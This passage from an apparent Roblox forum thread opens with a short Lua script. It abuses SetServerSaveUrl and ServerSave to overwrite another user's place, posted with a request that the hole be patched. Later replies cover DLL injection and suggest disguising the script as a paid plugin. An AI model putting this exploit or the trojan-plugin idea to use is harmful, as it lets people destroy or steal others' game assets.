|
I have tested it (stole one of my alternate accounts places, nobody elses)
It works, it would be nice is you patched it
local placeID =
s = Instance.new("ScreenGui", game.CoreGui)
s.Name = ("Steal")
PluginGuiworkspace = Instance.new("TextButton")
PluginGuiworkspace.Parent = s
PluginGuiworkspace.Size = UDim2.new(0,60,0,25)
PluginGuiworkspace.Position = UDim2.new(0,130,0,380)
PluginGuiworkspace.Text="Steal"
PluginGuiworkspace.BackgroundTransparency = 0.3
PluginGuiworkspace.TextColor = BrickColor.new("white")
PluginGuiworkspace.BackgroundColor = BrickColor.new("Gray")
PluginGuiworkspace.BorderColor = BrickColor.new("Black")
PluginGuiworkspace.Font = "ArialBold"
PluginGuiworkspace.FontSize = "Size14"
PluginGuiworkspace.TextStrokeColor3 = Color3.new(0/0,0/0,0/0)
PluginGuiworkspace.TextStrokeTransparency = 0.3
PluginGuiworkspace.BorderSizePixel = 1
PluginGuiworkspace.BorderColor = BrickColor.new("White")
PluginGuiworkspace.MouseButton1Down:connect(function()
game:SetServerSaveUrl("http://www.roblox.com/Data/Upload.ashx?assetid="..placeID)
game:ServerSave()
end)
|
|
|
|
|
@trio
Very possible, actually. Every time a Dll inject is patched, a new one takes its place. |
|
|
Just like with the noclip exploit. A new code is found within an hour after the patch. |
|
essu8Join Date: 2012-11-26 Post Count: 49 |
it's not a "code"
it's an address stupid
and it only changes because they obviously changed some code and recompiled stupid |
|
noliCAIKSJoin Date: 2010-03-08 Post Count: 917 |
@essu8
Your wisdom fils me with joy. |
|
essu8Join Date: 2012-11-26 Post Count: 49 |
omg stop bullying |
|
|
@Essu
I find your hostility very unneccesary. |
|
zars15Join Date: 2008-11-10 Post Count: 9999 |
@matey. They can't patch DLLs. I haven't heard of any program that doesn't allow DLLs(well probably there are some special programs dedicated for anti-dll security, but otherwise, almost all softwares can't stop DLL). |
|
booingJoin Date: 2009-05-04 Post Count: 6594 |
Several microsoft programs have DLL detection, but that's it. People are incredibly ignorant for thinking DLLs have to do with exploiting in all cases. The studio exploit that got leaked is just about the only case I can think of where putting an exploit in a DLL could make things easier, although he could have just done it manually in a trainer. |
|
zars15Join Date: 2008-11-10 Post Count: 9999 |
It's worth to make DLL if you're going to add like interesting user interface. For example: Multiple cheats in one DLL and have a nice windows form windows, with info like which of cheats are active and what button to toggle them. |
|
zxv12Join Date: 2009-07-18 Post Count: 286 |
Essu8 for president of the US please.
"wer only at war becus u nuked them stupid"
"well my adress is the white house stupid"
"well just put more taxes stupid" |
|
|
This script originates from one of the earliest and most major exploits,
it makes uses of the fact it runs as a core script to execute locked methods.
|
|
DannyCoreJoin Date: 2012-04-25 Post Count: 990 |
does this actually work?
I don't want to waste my time trying something that doesn't work. |
|
SharksieJoin Date: 2009-10-10 Post Count: 30576 |
Why do we even have DLLs? I'm no expert, but there must be a more secure way of doing things. |
|
zars15Join Date: 2008-11-10 Post Count: 9999 |
@Arceus. Libraries. C++ and similar stuff needz dem, and this is most simplest and most efficient one, I bet. |
|
|
DLLs contain code that can be used as add-ons to a program. |
|
|
I assume this is supposed to be loaded into a plugin online, so it pretty much useless unlike you need to steal bricks. Since script's sources are replicated, the entire game is pretty much still safe. |
|
VorliasJoin Date: 2009-08-27 Post Count: 14478 |
I'm guessing ServerSave() is the method used by private servers to save automatically? |
|
|
No, it sets the URL the place will save to when you exit. It's how when you play solo you can 'Save' from that nifty gui. |
|
VorliasJoin Date: 2009-08-27 Post Count: 14478 |
Ah, was just wondering since I was curious as if it would save the state on online mode or fetch the offline copy. |
|
pwnedu46Join Date: 2009-05-23 Post Count: 7534 |
Sorcus is on the Bus o' adult beverages. He might not be doing much bug fixing/moderating for a while.
https://twitter.com/Shedletsky/status/297519129122963458 |
|
FoolHaterJoin Date: 2008-07-17 Post Count: 2141 |
This would only be dangerous if you renamed it "Admin Attention-Grabbing Helps You Make Guis and Clan Buildings B/C You Don't Know How to Script" Plugin, and then get someone to buy it and run it in Studio. |
|
nate979oJoin Date: 2011-03-14 Post Count: 1284 |
y u no work |
|